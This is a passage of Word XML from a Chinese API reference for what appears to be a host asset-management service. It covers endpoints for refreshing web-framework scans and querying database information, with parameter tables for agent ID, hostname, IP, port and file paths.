    <w:p w14:paraId="10A11B84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA958D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC116CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00949E41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087C6C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E0BB38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B483B"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r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678EE70F"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046C44C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0430C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573ECE96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F883952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="480BB6AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60EAFA13" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48961FD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="424F52E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782BD6FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E35970" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31888352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc115166122"/>
      <w:bookmarkStart w:id="96" w:name="web应用框架信息查询扫描状态"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:t>Web应用框架信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="5D22A127" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询web应用框架信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D3022" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc115166123"/>
      <w:bookmarkStart w:id="98" w:name="数据库信息"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:t>数据库信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="077C4F76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470123CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的数据库信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C769AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E1BDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>数据库信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EFDD74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F81C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F1C86A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA27BA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E73C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CAFD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD20846" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13941802" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用数据库信息查询结果接口（即1-7号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369CF82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用8号接口进行更新再调用9号接口查看是否更新完成，最后再调用1-7号接口查</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A6C57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B35B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc115166124"/>
      <w:bookmarkStart w:id="100" w:name="数据库信息查询结果"/>
      <w:r>
        <w:t>数据库信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="33B7E3AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于通用数据库信息，按每台主机每个数据库进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A640E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514F50C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009B55C"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="483E988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F7F68C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E2A840" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435D8DEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771A5512" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D1FD548" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246EA97F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44692BED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11C7052F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B1E86A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66A5EB1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49462297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22A9E960" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6ADEA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DEC2074" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="196372B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0639A3CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C4E01BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A5525B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C55246E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B383C66" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1734BFE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DB2F08F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C39084" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8BE760" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01253F9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0771C576" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B10062" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B687223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00EF8DF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76FBCB88" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D05C3C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313362B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B5E0BDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01FA3625" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28A1EAB9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34BC130D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E33A0D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DADCD52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FAA7045" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E67DF86" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66B68502" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03199AB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0850EAB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23487972" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62181193" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61F6EF75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>logPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594D408B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B1FF59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9DAD8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>日志文件路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FFB9A02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5067314F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dataDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21DB75AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3E1661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
